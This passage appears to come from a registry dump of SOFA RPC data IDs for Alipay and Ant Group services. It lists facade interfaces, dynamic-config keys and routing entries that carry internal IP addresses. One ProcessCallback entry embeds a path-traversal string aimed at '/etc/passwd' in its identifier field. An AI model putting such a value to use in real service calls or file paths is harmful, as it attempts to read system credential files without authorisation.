FA","NS_Pub_Servers_TP_S_FP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.instasset.common.service.facade.CommonConfService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.AppSubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.dailymng.GrsGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.MerchantBillQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.24.172#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_benefitDefinitionOnlineApplySuccessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mdeduct@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.mng.PromoDayMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.guardianType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.auth_center.common.service.facade.specification.SpecificationService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.bd.BdEmployeeManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.levelpromo.LevelPromoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.orderlink.ArSynchService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:baitiaoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pricemng.common.service.facade.api.pricetemplate.PricemngPriceTemplateManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.util.MobilehaSofaConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:cloudasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.open.InstUserRoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insttrade:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.paramcore.common.service.domain.manage.facade.api.DomainServiceExecFacadeWrapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.equitypublishcore.common.service.facade.DaqInfoProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mcp.service.facade.isv.IsvVisitRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.UserSecurityRiskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.client.SystemAppInvokeService:1.0:finfocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.PartnerUserRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:punishcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.weather.RealWeatherServiceInCzone:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acspcore.common.service.spi.v0.ResourceProductInstanceSPI:1.0:xbossProductInstanceSPI@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ideploy.common.service.facade.workspace.WsExceptionTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fundselling.common.service.productx.facade.AssetCenterModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.test.TairTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:rcconsultcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkAutoType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.dataphin.openapi.LogicTableService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:finbatch@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.datasource.DatasourceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aciamconsole@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.distinguishprod.common.service.facade.pet.PetActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:timeout@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:meshyfbi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.ClientSwitchPlanMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iacctrans.service.facade.api.AccountTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:antkg_bundle_online_service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@testmeshend#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.girisk.common.service.facade.api.SysSafeScore.SysSafeScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.processmngTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.flowctrl60#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.tradeapcore:name=com.alipay.cif.drm.PasswordRevokeSwitch.paymentPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.ciecore.common.service.facade.StrategyVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.88.53#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.commandcenter.service.facade.api.AqcPmdResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.irecon.common.service.query.fundboss.api.QueryAccItemForPageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DMSINT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.116.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.spi.MessageSpi:1.0:kbbusinessprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.cfmng.biz.exratecenter.MessageFilter.clientRateWhiteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbasecore.service.v2.stream.facade.ClusterModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.pdcore.common.service.facade.fund.FundManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_SHOP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.admgr.common.service.facade.AdMarketTargetTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finaggexpcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.activity.service.DailyCashManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.admin.SynApiManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.ete.facade.BackendAnalyseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.common.service.facade.orderlink.OrderLinkQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.mitemcenter.common.service.facade.utils.ldc.ICLdcRzDrm.ldcRZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baoxiantrans.common.service.InsInvoiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerCoBuildingContactFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.cert.facade.CertCmdProxyService:1.0:caprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.117.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:kbasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pfunddts.common.facade.api.AccountInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.biz.tradepush.core.ProductPurchaseService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.graycore.common.service.facade.api.grayroute.RouteFlowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mcomment.common.service.facade.comment.CommentUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.alinode:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.picasso.common.service.facade.text.TextService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.certifymng.permlimitDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:microloan_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisoropen.common.service.facade.file.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:mrchorder@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpromobus.common.service.facade.recruit.api.RecruitOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instservice.common.service.facade.instserviceconfig.IscEngineModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.finaccenter.facade.api.CoaRuleOdpsBatchAndDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:serverlesssdk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.partner.api.PartnerProfileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.core.service.graylog.GraylogQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.productcenter.common.service.facade.ProductBillingCoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.AuthorizationAdapterFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.serviceTypeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insiop.common.service.facade.content.InsIopContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.FapEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransPrePaymentTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.56.52#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:jiyun@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ipromotioncenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:adtask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ipsponsorprod.biz.shared.message.MessageManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.176.223#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.73.153.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.iexchange.service.inner.ForeignExchangeCbService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.settlement.biz.shared.schedule.retry.RetryTaskLoader:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.gzone.InstCtrlInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache_dest.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S-cifprocess-light#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditsceneprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.134.193#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pricecenter.common.service.facade.api.template.TemplateCatalogOperateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alibaba.drc.rm.endpoint.openapi.SampleOpenApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ipsponsorprod.biz.point.service.PointQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.scheduler.common.cluster.config.ClusterConfig.masterInitRepeat,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.facade.DecodeBIzSenceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_ACCOUNTING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.unitestcenter.common.service.facade.api.DynamicCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/../../../../../../../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.ChannelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayProjectConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.common.service.facade.PlanJoinFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.msgcenter.NotifyMessageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:recruitcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.235#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:finpromoscene@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obcustomercore.common.service.facade.identity.MemberServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationActionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.194#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.couponcore.common.service.service.CouponRuleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.MonitorNotifyCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.middlewareMsgDingDing,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxcore.common.service.facade.api.permission.AuthQueryMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.gmp.openplatform.facade.SaasPortalServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.idpatrol.core.service.inspect.trInterface.TrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.developerops.facade.api.OpsAbilityTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.finfocore.biz.finfoservice.fop.drm.ThreadPoolConfig.queueCapacitySize,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iamlscan.common.service.query.facade.api.AmlSiftService:1.0:amlcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdsr.common.service.facade.ProxyClient:1.0:antbuserviceProxyClient_antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ccmfactory.facade.object.AppSchemaObjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkede.metacenter.rest.TenantRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchmobile.common.service.facade.widget.operation.TopicFlagUIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mymdp.common.service.facade.service.dataSource.DataSourceConfigureService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductService:1.0:zhubalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.minitrans.service.facade.parentchildmodel.api.PcmtransTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zdatabus.facade.RefreshClientConfigService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_RISK_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:pcinstecoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.InstitutionDrmResource.signCreditAuthOrgsOfJBPlus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:instdatalink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.paycore.PmtFnaBizTypeCfgFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.mordercenter.MocOrderCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.api.GenericService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootwebdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_EBPPGW_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iotcubeGzoneTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.180.14#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:fraudmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.dummy.DummySecuUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.scenario.api.FixedEndFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.service.facade.OpenRouteConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantOutcallService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.split.Splitor:1.0:aiceTaskSplitor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.apportion.service.OverdueRepaymentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.insmobile.insmobileConfDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbservcenter.common.service.facade.job.JobBizConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:assetpreferweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfundprod.core.service.account.AccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.common.service.facade.api.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:openitemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitymonicalc.common.service.api.IndicatorDataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.groot:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcdp.common.service.facade.content.KbcdpContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.service.integration.fintradecenter.OrderPushFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.template.api.TemplateParameterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.partner.PartnerCoBuildingMpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.withdraw.WithdrawQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcRecordSynchronizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.TopManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcustprod.common.service.facade.api.DictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.FeatureConfigSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ufe.engine.facade.runtime.UfeLabelCalService:1.0:ngfe-service@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.MstlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.237.101#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.customerrank.CustomerRankRiskQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:acrmng-creditAuditCallBackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.skipStopProfitRedeemMessageSubContractIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acassistant.common.service.facade.CommonFacade:1.0:commonFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:finsightmng_antProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.tag.TagQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:LINGKAI_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.gui.InternalTradeStrategyMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.tempSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.omocore.common.service.facade.spi.ServiceOrderSpiFacade:1.0:autoinsprodServiceOrderSpiFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pcreditamount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.MarketingConfigDrmResource.blockedPcmServiceCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:paymentmng-psSlipCallbackManageFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.255.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanP2pConfigDrm.